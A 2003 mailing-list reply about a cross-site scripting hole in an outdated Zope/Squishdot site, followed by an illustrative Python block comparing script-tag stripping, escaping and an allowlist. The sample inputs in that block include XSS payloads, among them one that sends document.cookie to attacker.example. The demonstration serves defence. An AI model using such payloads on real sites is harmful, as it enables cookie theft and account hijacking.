On Tue, Jul 01, 2003 at 02:53:19PM +0300, Aviram Jenik wrote:
> On Tuesday 01 July 2003 10:08, Tzafrir Cohen wrote:
> >
> > The version of Zope on IGLU is quite old. 2.1-something, IIRC. The
> > version of Squishdot is probably almost as old.
> >
> > Upgrade? Replace with something else (that people here know how to
> > maintain)? This question has arisen several times in the past.
>
> I would of course recommend upgrading, but there might be other considerations
> involved from your side, so it's obviously up to you guys to decide.
> However, whatever you decide about Zope, make sure you filter <script> tags,
> in whatever workaround you can find for it - as it is now, anyone can steal
> the administrative cookie, or post fake news as someone else, or a bunch of
> other Cross-Site-Scripting attacks. This is no longer a theoretical
> vulnerability: there are people who know IGLU is vulnerable (2600) and they
> are already actively exploiting it!
Some relevant links:
A similar problem acknowledged in Feb 2000:
http://squishdot.org/949677969/index_html
The workaround from there: moderate replies.
Problem should have been fixed in Squishdot 1.0, Mar 2001:
http://squishdot.org/985283025/index_html
BTW: take a look at the changelog: http://squishdot.org/Documentation/Changes
specifically, version 0.6 :-)
--
Tzafrir Cohen +---------------------------+
http://www.technion.ac.il/~tzafrir/ |vim is a mutt's best friend|
mailto:[EMAIL PROTECTED] +---------------------------+
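As an added illustration of the "filter <script> tags" workaround discussed above (example code written for this page, not code from Squishdot, Zope or IGLU; Python 3 is assumed even though Zope of that era ran on Python 2): the block compares a naive script-tag filter with escaping and with an attribute-free tag allowlist, run over constructed sample posts. The host attacker.example and the sample post bodies are made up for the demonstration.

```python
import html
import re

# Constructed sample post bodies (not real IGLU content): one benign post with
# harmless markup, two script-tag cookie stealers, and one that needs no
# <script> tag at all.
SAMPLE_POSTS = [
    "Hello <b>world</b>",
    '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
    '<SCRIPT src="http://attacker.example/x.js"></SCRIPT>',
    '<img src=x onerror="alert(document.cookie)">',
]

SCRIPT_TAG_RE = re.compile(r"<\s*/?\s*script\b[^>]*>", re.IGNORECASE)


def strip_script_tags(text):
    """The minimal workaround: drop <script> and </script> tags (any case).

    Everything else is left as-is, so event-handler attributes such as
    onerror= still reach the browser and still run."""
    return SCRIPT_TAG_RE.sub("", text)


def escape_all(text):
    """The robust fix when no user markup is needed: turn every HTML
    metacharacter into an entity so the post renders as plain text."""
    return html.escape(text, quote=True)


ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br"}
TAG_RE = re.compile(r"<(/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>")


def allowlist_html(text):
    """Middle ground: escape everything, then re-emit only a fixed set of
    formatting tags, always without attributes. Because attributes are
    discarded, onerror=, onclick=, javascript: hrefs etc. never survive."""
    out = []
    pos = 0
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()], quote=True))
        closing, name = m.group(1), m.group(2).lower()
        if name in ALLOWED_TAGS:
            out.append("<%s%s>" % (closing, name))
        else:
            out.append(html.escape(m.group(0), quote=True))
        pos = m.end()
    out.append(html.escape(text[pos:], quote=True))
    return "".join(out)


if __name__ == "__main__":
    for post in SAMPLE_POSTS:
        print("input     :", post)
        print("strip tags:", strip_script_tags(post))
        print("escape    :", escape_all(post))
        print("allowlist :", allowlist_html(post))
        print()
```

Running it shows the caveat a practitioner would want: the script-tag filter neutralises the two <script> posts but passes the onerror post through untouched, while escaping or the allowlist leave no executable markup in any of them.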